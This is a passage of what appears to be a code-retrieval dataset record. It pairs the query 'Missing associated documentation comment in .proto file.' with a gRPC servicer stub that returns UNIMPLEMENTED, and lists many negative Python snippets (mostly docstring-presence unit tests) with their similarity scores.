self.assertTrue(Rectangle.to_dictionary.__doc__)", "def __init__(\n self,\n *,\n public_comment: typing.Optional[str] = None,\n status: typing.Optional[Assignment.Status] = None\n ) -> None:\n ...", "def test_class_doc(self):\n self.assertTrue(len(City.__doc__) > 0)", "def test_doc1(self):\n assert models.review.__doc__ is not None", "def test_doctest(self):\n self.assertTrue(BaseModel.__doc__)\n self.assertTrue(BaseModel.__init__.__doc__)\n self.assertTrue(BaseModel.__str__.__doc__)\n self.assertTrue(BaseModel.save.__doc__)\n self.assertTrue(BaseModel.to_dict.__doc__)", "def should_add_pr_comment(self):\n pass", "def test_findDocumentation(self):\n doc = self.builder._findChanges(\n self.project, self.builder._DOC)\n self.assertEquals(\n doc,\n [(40, 'foo.bar.Baz.quux'),\n (41, 'writing Foo servers')])", "def test_doc_with_comments():\n doc = 
CoNLL.conll2doc(input_str=RUSSIAN_SAMPLE)\n check_russian_doc(doc)", "def test_method_docs(self):\n for func in dir(Base):\n self.assertTrue(len(func.__doc__) > 0)", "def public_fn_with_googley_docstring(self, name, another, state=None):\n return 0", "def test_state_class_docstring(self):\n self.assertIsNot(State.__doc__, None,\n \"docstring not found in State class\")\n self.assertTrue(len(State.__doc__) >= 1,\n \"docstring not found in State class\")", "def getStructPb2():\n return struct_pb2", "def to_proto(self) -> None:\n\n pass", "def test_doc_string():\n # Create fake profiles library by named tuples\n faker_db = session10.create_fake_library_by_namedtuple(10)\n\n assert len(faker_db.__doc__) > 0 , \"Doc string is missing\"", "def test_swagger_field_is_required():\n raw_schema = RawSchemaFactory()\n raw_schema.pop('swagger', None)\n\n assert 'swagger' not in raw_schema\n\n with pytest.raises(ValidationError) as err:\n swagger_schema_validator(raw_schema)\n\n assert_message_in_errors(\n MESSAGES['required']['required'],\n err.value.detail,\n 'required.swagger',\n )", "def brief_documentation(method: object) -> str:\n doc = method.__doc__\n if doc is not None:\n lines = doc.splitlines()\n if len(lines) > 0:\n return lines[0]\n return ''", "def proto_generation_callable(self):\n raise NotImplementedError()", "def proto_generation_callable(self):\n raise NotImplementedError()", "def document(self):\n ...", "def assert_doc_extensions(doc):\n pass", "def comment():", "def test_doc_module(self):\n from models import user\n\n self.assertTrue(len(user.__doc__) > 0)\n self.assertTrue(len(user.User.__doc__) > 0)", "def test_doc(cls, type_str):\n do_doc_test(cls, type_str)", "def test_docstring(self):\n self.assertIsNotNone(City.__doc__)" ]
[ "0.6347405", "0.62316597", "0.62253404", "0.6107218", "0.60712713", "0.6055634", "0.60191995", "0.5996731", "0.597168", "0.59466904", "0.59434444", "0.59335643", "0.5919223", "0.5902901", "0.58987755", "0.5864407", "0.5856765", "0.5836615", "0.57913834", "0.57687634", "0.5763714", "0.57372254", "0.5724019", "0.5721367", "0.57097507", "0.5693322", "0.5633919", "0.5631681", "0.5627807", "0.56277686", "0.5608027", "0.55785465", "0.5573401", "0.55674845", "0.55551904", "0.5549059", "0.553947", "0.5534518", "0.5531683", "0.55310714", "0.55151445", "0.55110514", "0.5500249", "0.5493004", "0.548441", "0.5478941", "0.5474353", "0.5463836", "0.5458455", "0.5458455", "0.5458455", "0.5452267", "0.54450864", "0.54251957", "0.5421046", "0.5412398", "0.5397417", "0.5395437", "0.5393102", "0.5386761", "0.53758156", "0.5353344", "0.53435314", "0.5338307", "0.5337008", "0.53325796", "0.53264475", "0.5325588", "0.5324948", "0.5321367", "0.53188294", "0.5317395", "0.5313514", "0.5306335", "0.52826846", "0.526687", "0.5262916", "0.5252228", "0.52204585", "0.52173424", "0.52134776", "0.5213095", "0.5209492", "0.52052844", "0.5204341", "0.51928616", "0.51881623", "0.5186641", "0.51833606", "0.5181922", "0.51770014", "0.51718605", "0.5163659", "0.5162326", "0.5162326", "0.5161769", "0.51591885", "0.5157628", "0.5145468", "0.51423216", "0.5138763" ]
0.0
-1
Missing associated documentation comment in .proto file.
def SetLogLevel(self, request, context):
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_doc(self):\n raise NotImplementedError()", "def inherits_doc():\n pass", "def documentation_only():\n pass", "def DocString():\n return", "def test_module_doc(self):\n self.assertTrue(len(base.__doc__) > 0)", "def pythondoc(self, irc, msg, args, num, req):\n self.googleq('http://docs.python.org/library/', req, num, irc)", "def cppdoc(self, irc, msg, args, num, req):\n self.googleq('www.cplusplus.com/reference/', req, num, irc)", "def testDocstring(self):\n class NotImportant(messages.Enum):\n \"\"\"I have a docstring.\"\"\"\n\n VALUE1 = 1\n\n self.assertEquals('I have a docstring.', NotImportant.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(base_model.__doc__) > 0)", "def phpdoc(self, irc, msg, args, num, req):\n self.googleq('http://php.net/manual/en/', req, num, irc)", "def strip_doc_string(proto: google.protobuf.message.Message) -> None:\n if not isinstance(proto, google.protobuf.message.Message):\n raise TypeError(\n f\"proto must be an instance of {google.protobuf.message.Message}.\"\n )\n for descriptor in proto.DESCRIPTOR.fields:\n if descriptor.name == \"doc_string\":\n proto.ClearField(descriptor.name)\n elif descriptor.type == descriptor.TYPE_MESSAGE:\n if descriptor.label == descriptor.LABEL_REPEATED:\n for x in getattr(proto, descriptor.name):\n strip_doc_string(x)\n elif proto.HasField(descriptor.name):\n strip_doc_string(getattr(proto, descriptor.name))", "def docstring_hack():\n pass", "def check_documentation(self):\n\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(__init__.__doc__)\n self.assertIsNotNone(__str__.__doc__)\n self.assertIsNotNone(save.__doc__)\n self.assertIsNotNone(to_dict.__doc__)", "def consistent_documentation():\n\n return 3", "def test_init_doc(self):\n self.assertTrue(\n len(Review.__init__.__doc__) > 10\n )", "def test_missing_docstring(a, b): # noqa: D213, D407", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)", "def test_docstring(self):\n self.assertTrue(len(BaseModel.__doc__) > 1)\n self.assertTrue(len(BaseModel.__init__.__doc__) > 1)\n self.assertTrue(len(BaseModel.__str__.__doc__) > 1)\n self.assertTrue(len(BaseModel.save.__doc__) > 1)\n self.assertTrue(len(BaseModel.to_dict.__doc__) > 1)", "def __doc__(self, ???):", "def test_class_doc(self):\n self.assertTrue(\n len(Review.__doc__) > 10\n )", "def test_module_doc(self):\n self.assertTrue(len(amenity.__doc__) > 0)", "def test_docstring(self):\n self.assertIsNotNone(Base.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(r.__doc__) > 10)", "def test_docstring(self):\n self.assertIsNotNone(Place.__doc__)", "def test_documentation(self):\n self.assertTrue(hasattr(Base, \"__init__\"))\n self.assertTrue(hasattr(Base, \"create\"))\n self.assertTrue(hasattr(Base, \"to_json_string\"))\n self.assertTrue(hasattr(Base, \"from_json_string\"))\n self.assertTrue(hasattr(Base, \"save_to_file\"))\n self.assertTrue(hasattr(Base, \"load_from_file\"))\n self.assertTrue(Base.__init__.__doc__)\n self.assertTrue(Base.create.__doc__)\n self.assertTrue(Base.to_json_string.__doc__)\n self.assertTrue(Base.from_json_string.__doc__)\n self.assertTrue(Base.save_to_file.__doc__)\n self.assertTrue(Base.load_from_file.__doc__)", "def has_doc() -> None:", "def test_doc(self):\n self.assertTrue(len(max_integer.__doc__) > 0)\n self.assertTrue(len(__import__('6-max_integer').__doc__) > 0)", "def test_docstring(self):\n self.assertTrue(len(City.__doc__) > 1)\n self.assertTrue(len(City.__init__.__doc__) > 1)\n self.assertTrue(len(City.__str__.__doc__) > 1)\n 
self.assertTrue(len(City.save.__doc__) > 1)\n self.assertTrue(len(City.to_dict.__doc__) > 1)", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)\n self.assertIsNotNone(Review.text.__doc__)", "def test_docstring(self):\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)", "def fini_doc(self):\n raise NotImplementedError()", "def test_doc():\n pass", "def test_module_doc(self):\n self.assertTrue(len(user.__doc__) > 0)", "def lispdoc(self, irc, msg, args, num, req):\n self.googleq('http://lispdoc.com/', req, num, irc)", "def test_module_doc(self):\n self.assertTrue(len(models.amenity.__doc__) > 0)", "def bus_func_doc(self, bus):\n return None", "def test_doc2(self):\n assert Review.__doc__ is not None", "def c_comment(self, token: Token):\n if token.value.startswith(\"/**\"):\n self.doc_comments.append(PrefixCppDocComment(token))", "def test_module_doc(self):\n self.assertTrue(len(State.__doc__) > 0)", "def test_module_doc(self):\n self.assertTrue(len(db_storage.__doc__) > 0)", "def test_BaseModel_cls_doc(self):\n self.assertIsNotNone(BaseModel.__doc__)", "def doc_string():\n pass # pass does nothing", "def test_docstrings(self):\n self.assertEqual(len(Rectangle.__doc__) > 0, True)\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def test_student_module_docstring(self):\n self.assertIsNot(student.__doc__, None,\n \"student.py needs a docstring\")\n self.assertTrue(len(student.__doc__) >= 1,\n \"student.py needs a docstring\")", "def test_documentation(self):\n doc = City.__doc__\n self.assertGreaterEqual(len(doc), 1)", "def test_Userdoc(self):\n self.assertNotEqual(len(User.__doc__), 0)", "def __init__ (self, docstring, name, isInternal):\n\n # Take out excess leading blank lines.\n docstring = re.sub('/\\*\\*(\\s+\\*)+', r'/** \\n *', docstring)\n\n self.docstring = docstring\n self.name = name\n self.isInternal = isInternal", "def test_module_doc(self):\n self.assertTrue(len(city.__doc__) > 0)", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def test_BaseModel_methods_doc(self):\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.__str__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)\n self.assertIsNotNone(BaseModel.to_dict.__doc__)", "def javadoc(self, irc, msg, args, num, req):\n self.googleq('download.oracle.com/javase/6/docs/', req, num, irc)", "def implement(self):\n\t#@DEBUG remove comments", "def magic_pdoc(self, parameter_s=''):\n 
self._inspect('pdoc',parameter_s)", "def dummy(doc):\r\n return doc", "def _add_doc(func, doc):\n func.__doc__ = doc", "def test_proto_spec(self):\n proto_name = 'org.xlattice.upax'\n node_reg = reg.NodeReg()\n proto_reg = reg.ProtoReg(proto_name, node_reg)\n msg_reg = reg.MsgReg(proto_reg)\n proto_spec = M.ProtoSpec(proto_name, proto_reg)\n self.assertEqual(proto_name, proto_spec.name)\n parent = M.ProtoSpec(proto_name, proto_reg)\n\n msg_name = 'logEntry'\n # the enum is not used\n enum = M.EnumSpec.create('Joe', [\n ('oh', 92), ('hello', 47), ('there', 322), ])\n fields = [\n # pylint: disable=no-member\n M.FieldSpec(\n msg_reg,\n 'timestamp',\n FieldTypes.F_UINT32,\n Quants.REQUIRED,\n 0),\n M.FieldSpec(\n msg_reg,\n 'node_id',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 1),\n M.FieldSpec(\n msg_reg,\n 'key',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 2),\n M.FieldSpec(\n msg_reg,\n 'length',\n FieldTypes.V_UINT32,\n Quants.REQUIRED,\n 3),\n M.FieldSpec(\n msg_reg,\n 'by_',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 4),\n M.FieldSpec(\n msg_reg,\n 'path',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 5),\n ]\n msg_spec = M.MsgSpec(msg_name, msg_reg, proto_spec)\n self.assertEqual(msg_name, msg_spec.name)\n for file in fields:\n msg_spec.add_field(file)\n\n # proto_spec.add_msg(msg_spec) # correctly commented out\n self.round_trip_poto_spec_via_string(proto_spec) # GEEP", "def test_student_class_docstring(self):\n self.assertIsNot(Student.__doc__, None,\n \"Student class needs a docstring\")\n self.assertTrue(len(Student.__doc__) >= 1,\n \"Student class needs a docstring\")", "def main_docstring():", "def test_docstring(self):\n self.assertTrue(len(FileStorage.__doc__) > 1)\n self.assertTrue(len(FileStorage.all.__doc__) > 1)\n self.assertTrue(len(FileStorage.new.__doc__) > 1)\n self.assertTrue(len(FileStorage.save.__doc__) > 1)\n self.assertTrue(len(FileStorage.reload.__doc__) > 1)", "def describe(self):\n return \"The method describe() is not implemented\"", "def test_console_documented(self):\n self.assertTrue\n self.assertTrue\n (len(HBNBCommand.__doc__) >= 1)", "def test_class_docstrings(self):\n self.assertGreater(len(self.storage.__doc__), 1)", "def __init__(self, proto):\n self.proto = proto", "def func_doc():", "def get_documentation(self, *args, **dargs):\n pass", "def __init__ (self, isInternal, docstring, name, args, isConst):\n\n self.name = name\n self.isConst = isConst\n self.isInternal = isInternal\n\n if isInternal:\n if language == 'java':\n # We have a special Javadoc doclet that understands a non-standard\n # Javadoc tag, @internal. When present in the documentation string\n # of a method, it causes it to be excluded from the final\n # documentation output. @internal is something doxygen offers.\n #\n p = re.compile('(\\s+?)\\*/', re.MULTILINE)\n self.docstring = p.sub(r'\\1* @internal\\1*/', docstring)\n elif language == 'csharp':\n # We mark internal methods in a different way for C#.\n self.docstring = docstring\n else:\n self.docstring = \" @internal\\n\" + docstring\n else:\n self.docstring = docstring\n\n # In Java and C#, if a method is const and swig has to translate the type,\n # then for some reason swig cannot match up the resulting doc strings\n # that we put into %javamethodmodifiers. The result is that the java\n # documentation for the methods are empty. 
I can't figure out why, but\n # have figured out that if we omit the argument list in the doc string\n # that is put on %javamethodmodifiers for such case, swig does generate \n # the comments for those methods. This approach is potentially dangerous\n # because swig might attach the doc string to the wrong method if a\n # methods has multiple versions with varying argument types, but the\n # combination doesn't seem to arise in antimony currently, and anyway,\n # this fixes a real problem in the Java documentation for antimony.\n\n if language == 'java' or language == 'csharp':\n if isConst and (args.find('unsigned int') >= 0):\n self.args = ''\n elif not args.strip() == '()':\n if isConst:\n self.args = args + ' const'\n else:\n self.args = args\n else:\n if isConst:\n self.args = '() const'\n else:\n self.args = ''\n else:\n self.args = args", "def guess(cls, docstring):", "def HandleMissingParameterDoc(self, token, param_name):\n raise TypeError('Abstract method HandleMissingParameterDoc not implemented')", "def shortDescription(self):\n # Suppress default logging of docstrings.\n return None", "def docs():", "def __init__(self):\n super(MethodInfo, self).__init__()\n self.DocString = None", "def test_file_storage_module_docstring(self):\n self.assertIsNot(file_storage.__doc__, None,\n \"file_storage.py needs a docstring\")\n self.assertTrue(len(file_storage.__doc__) >= 1,\n \"file_storage.py needs a docstring\")", "def handle_protobuf(self, message: protobuf.ProtocolMessage) -> None:", "def test_doc_file(self):\n expected = 'City class handles all application cities'\n actual = City.__doc__\n self.assertEqual(expected, actual)", "def missed_needed_docstring(self):\n self.needed += 1\n self.missing += 1", "def test_documentation(self):\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def __init__(\n self,\n *,\n public_comment: typing.Optional[str] = None,\n status: typing.Optional[Assignment.Status] = None\n ) -> None:\n ...", "def test_class_doc(self):\n self.assertTrue(len(City.__doc__) > 0)", "def test_doc1(self):\n assert models.review.__doc__ is not None", "def test_doctest(self):\n self.assertTrue(BaseModel.__doc__)\n self.assertTrue(BaseModel.__init__.__doc__)\n self.assertTrue(BaseModel.__str__.__doc__)\n self.assertTrue(BaseModel.save.__doc__)\n self.assertTrue(BaseModel.to_dict.__doc__)", "def should_add_pr_comment(self):\n pass", "def test_findDocumentation(self):\n doc = self.builder._findChanges(\n self.project, self.builder._DOC)\n self.assertEquals(\n doc,\n [(40, 'foo.bar.Baz.quux'),\n (41, 'writing Foo servers')])", "def test_doc_with_comments():\n doc = 
CoNLL.conll2doc(input_str=RUSSIAN_SAMPLE)\n check_russian_doc(doc)", "def test_method_docs(self):\n for func in dir(Base):\n self.assertTrue(len(func.__doc__) > 0)", "def public_fn_with_googley_docstring(self, name, another, state=None):\n return 0", "def test_state_class_docstring(self):\n self.assertIsNot(State.__doc__, None,\n \"docstring not found in State class\")\n self.assertTrue(len(State.__doc__) >= 1,\n \"docstring not found in State class\")", "def getStructPb2():\n return struct_pb2", "def to_proto(self) -> None:\n\n pass", "def test_doc_string():\n # Create fake profiles library by named tuples\n faker_db = session10.create_fake_library_by_namedtuple(10)\n\n assert len(faker_db.__doc__) > 0 , \"Doc string is missing\"", "def test_swagger_field_is_required():\n raw_schema = RawSchemaFactory()\n raw_schema.pop('swagger', None)\n\n assert 'swagger' not in raw_schema\n\n with pytest.raises(ValidationError) as err:\n swagger_schema_validator(raw_schema)\n\n assert_message_in_errors(\n MESSAGES['required']['required'],\n err.value.detail,\n 'required.swagger',\n )", "def brief_documentation(method: object) -> str:\n doc = method.__doc__\n if doc is not None:\n lines = doc.splitlines()\n if len(lines) > 0:\n return lines[0]\n return ''", "def proto_generation_callable(self):\n raise NotImplementedError()", "def proto_generation_callable(self):\n raise NotImplementedError()", "def document(self):\n ...", "def assert_doc_extensions(doc):\n pass", "def comment():", "def test_doc_module(self):\n from models import user\n\n self.assertTrue(len(user.__doc__) > 0)\n self.assertTrue(len(user.User.__doc__) > 0)", "def test_doc(cls, type_str):\n do_doc_test(cls, type_str)", "def test_docstring(self):\n self.assertIsNotNone(City.__doc__)" ]
[ "0.6348721", "0.6232983", "0.6227791", "0.6107919", "0.6073252", "0.6056996", "0.60199225", "0.5997295", "0.5973073", "0.59475285", "0.59426475", "0.59348774", "0.59195995", "0.59041727", "0.5899058", "0.5865414", "0.5857725", "0.5836395", "0.57917976", "0.57693964", "0.5765628", "0.5738139", "0.5725729", "0.57218313", "0.57099766", "0.5694849", "0.5634908", "0.5631503", "0.562838", "0.5627863", "0.5609239", "0.55800056", "0.5575202", "0.5568366", "0.5556774", "0.554996", "0.55403715", "0.5535095", "0.55324805", "0.55324376", "0.5515471", "0.551169", "0.5499882", "0.54952186", "0.54851204", "0.547969", "0.54744124", "0.5465293", "0.5460546", "0.5460546", "0.5460546", "0.5452012", "0.54468", "0.542486", "0.54212755", "0.5413558", "0.5397512", "0.53957206", "0.53943235", "0.5388301", "0.5376187", "0.5353345", "0.534334", "0.5337087", "0.5336514", "0.53339815", "0.5328619", "0.53255814", "0.53247285", "0.5322686", "0.5319762", "0.53191066", "0.53140306", "0.53077936", "0.5279659", "0.5267621", "0.5264218", "0.5252085", "0.5219406", "0.5217774", "0.5214222", "0.5213382", "0.52094376", "0.52063346", "0.5204785", "0.5193972", "0.5189197", "0.51867706", "0.5182037", "0.51802737", "0.5177115", "0.5172607", "0.5164527", "0.51625025", "0.51625025", "0.5162299", "0.5160613", "0.5157092", "0.51471317", "0.5142684", "0.51393735" ]
0.0
-1
Missing associated documentation comment in .proto file.
def GetDumpV2Template(self, request, context):
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_doc(self):\n raise NotImplementedError()", "def inherits_doc():\n pass", "def documentation_only():\n pass", "def DocString():\n return", "def test_module_doc(self):\n self.assertTrue(len(base.__doc__) > 0)", "def pythondoc(self, irc, msg, args, num, req):\n self.googleq('http://docs.python.org/library/', req, num, irc)", "def cppdoc(self, irc, msg, args, num, req):\n self.googleq('www.cplusplus.com/reference/', req, num, irc)", "def testDocstring(self):\n class NotImportant(messages.Enum):\n \"\"\"I have a docstring.\"\"\"\n\n VALUE1 = 1\n\n self.assertEquals('I have a docstring.', NotImportant.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(base_model.__doc__) > 0)", "def phpdoc(self, irc, msg, args, num, req):\n self.googleq('http://php.net/manual/en/', req, num, irc)", "def strip_doc_string(proto: google.protobuf.message.Message) -> None:\n if not isinstance(proto, google.protobuf.message.Message):\n raise TypeError(\n f\"proto must be an instance of {google.protobuf.message.Message}.\"\n )\n for descriptor in proto.DESCRIPTOR.fields:\n if descriptor.name == \"doc_string\":\n proto.ClearField(descriptor.name)\n elif descriptor.type == descriptor.TYPE_MESSAGE:\n if descriptor.label == descriptor.LABEL_REPEATED:\n for x in getattr(proto, descriptor.name):\n strip_doc_string(x)\n elif proto.HasField(descriptor.name):\n strip_doc_string(getattr(proto, descriptor.name))", "def docstring_hack():\n pass", "def check_documentation(self):\n\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(__init__.__doc__)\n self.assertIsNotNone(__str__.__doc__)\n self.assertIsNotNone(save.__doc__)\n self.assertIsNotNone(to_dict.__doc__)", "def consistent_documentation():\n\n return 3", "def test_init_doc(self):\n self.assertTrue(\n len(Review.__init__.__doc__) > 10\n )", "def test_missing_docstring(a, b): # noqa: D213, D407", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)", "def test_docstring(self):\n self.assertTrue(len(BaseModel.__doc__) > 1)\n self.assertTrue(len(BaseModel.__init__.__doc__) > 1)\n self.assertTrue(len(BaseModel.__str__.__doc__) > 1)\n self.assertTrue(len(BaseModel.save.__doc__) > 1)\n self.assertTrue(len(BaseModel.to_dict.__doc__) > 1)", "def __doc__(self, ???):", "def test_class_doc(self):\n self.assertTrue(\n len(Review.__doc__) > 10\n )", "def test_module_doc(self):\n self.assertTrue(len(amenity.__doc__) > 0)", "def test_docstring(self):\n self.assertIsNotNone(Base.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(r.__doc__) > 10)", "def test_docstring(self):\n self.assertIsNotNone(Place.__doc__)", "def test_documentation(self):\n self.assertTrue(hasattr(Base, \"__init__\"))\n self.assertTrue(hasattr(Base, \"create\"))\n self.assertTrue(hasattr(Base, \"to_json_string\"))\n self.assertTrue(hasattr(Base, \"from_json_string\"))\n self.assertTrue(hasattr(Base, \"save_to_file\"))\n self.assertTrue(hasattr(Base, \"load_from_file\"))\n self.assertTrue(Base.__init__.__doc__)\n self.assertTrue(Base.create.__doc__)\n self.assertTrue(Base.to_json_string.__doc__)\n self.assertTrue(Base.from_json_string.__doc__)\n self.assertTrue(Base.save_to_file.__doc__)\n self.assertTrue(Base.load_from_file.__doc__)", "def has_doc() -> None:", "def test_doc(self):\n self.assertTrue(len(max_integer.__doc__) > 0)\n self.assertTrue(len(__import__('6-max_integer').__doc__) > 0)", "def test_docstring(self):\n self.assertTrue(len(City.__doc__) > 1)\n self.assertTrue(len(City.__init__.__doc__) > 1)\n self.assertTrue(len(City.__str__.__doc__) > 1)\n 
self.assertTrue(len(City.save.__doc__) > 1)\n self.assertTrue(len(City.to_dict.__doc__) > 1)", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)\n self.assertIsNotNone(Review.text.__doc__)", "def test_docstring(self):\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)", "def fini_doc(self):\n raise NotImplementedError()", "def test_doc():\n pass", "def test_module_doc(self):\n self.assertTrue(len(user.__doc__) > 0)", "def lispdoc(self, irc, msg, args, num, req):\n self.googleq('http://lispdoc.com/', req, num, irc)", "def test_module_doc(self):\n self.assertTrue(len(models.amenity.__doc__) > 0)", "def bus_func_doc(self, bus):\n return None", "def test_doc2(self):\n assert Review.__doc__ is not None", "def c_comment(self, token: Token):\n if token.value.startswith(\"/**\"):\n self.doc_comments.append(PrefixCppDocComment(token))", "def test_module_doc(self):\n self.assertTrue(len(State.__doc__) > 0)", "def test_module_doc(self):\n self.assertTrue(len(db_storage.__doc__) > 0)", "def test_BaseModel_cls_doc(self):\n self.assertIsNotNone(BaseModel.__doc__)", "def doc_string():\n pass # pass does nothing", "def test_docstrings(self):\n self.assertEqual(len(Rectangle.__doc__) > 0, True)\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def test_student_module_docstring(self):\n self.assertIsNot(student.__doc__, None,\n \"student.py needs a docstring\")\n self.assertTrue(len(student.__doc__) >= 1,\n \"student.py needs a docstring\")", "def test_documentation(self):\n doc = City.__doc__\n self.assertGreaterEqual(len(doc), 1)", "def test_Userdoc(self):\n self.assertNotEqual(len(User.__doc__), 0)", "def __init__ (self, docstring, name, isInternal):\n\n # Take out excess leading blank lines.\n docstring = re.sub('/\\*\\*(\\s+\\*)+', r'/** \\n *', docstring)\n\n self.docstring = docstring\n self.name = name\n self.isInternal = isInternal", "def test_module_doc(self):\n self.assertTrue(len(city.__doc__) > 0)", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def test_BaseModel_methods_doc(self):\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.__str__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)\n self.assertIsNotNone(BaseModel.to_dict.__doc__)", "def javadoc(self, irc, msg, args, num, req):\n self.googleq('download.oracle.com/javase/6/docs/', req, num, irc)", "def implement(self):\n\t#@DEBUG remove comments", "def magic_pdoc(self, parameter_s=''):\n 
self._inspect('pdoc',parameter_s)", "def dummy(doc):\r\n return doc", "def test_proto_spec(self):\n proto_name = 'org.xlattice.upax'\n node_reg = reg.NodeReg()\n proto_reg = reg.ProtoReg(proto_name, node_reg)\n msg_reg = reg.MsgReg(proto_reg)\n proto_spec = M.ProtoSpec(proto_name, proto_reg)\n self.assertEqual(proto_name, proto_spec.name)\n parent = M.ProtoSpec(proto_name, proto_reg)\n\n msg_name = 'logEntry'\n # the enum is not used\n enum = M.EnumSpec.create('Joe', [\n ('oh', 92), ('hello', 47), ('there', 322), ])\n fields = [\n # pylint: disable=no-member\n M.FieldSpec(\n msg_reg,\n 'timestamp',\n FieldTypes.F_UINT32,\n Quants.REQUIRED,\n 0),\n M.FieldSpec(\n msg_reg,\n 'node_id',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 1),\n M.FieldSpec(\n msg_reg,\n 'key',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 2),\n M.FieldSpec(\n msg_reg,\n 'length',\n FieldTypes.V_UINT32,\n Quants.REQUIRED,\n 3),\n M.FieldSpec(\n msg_reg,\n 'by_',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 4),\n M.FieldSpec(\n msg_reg,\n 'path',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 5),\n ]\n msg_spec = M.MsgSpec(msg_name, msg_reg, proto_spec)\n self.assertEqual(msg_name, msg_spec.name)\n for file in fields:\n msg_spec.add_field(file)\n\n # proto_spec.add_msg(msg_spec) # correctly commented out\n self.round_trip_poto_spec_via_string(proto_spec) # GEEP", "def _add_doc(func, doc):\n func.__doc__ = doc", "def test_student_class_docstring(self):\n self.assertIsNot(Student.__doc__, None,\n \"Student class needs a docstring\")\n self.assertTrue(len(Student.__doc__) >= 1,\n \"Student class needs a docstring\")", "def main_docstring():", "def test_docstring(self):\n 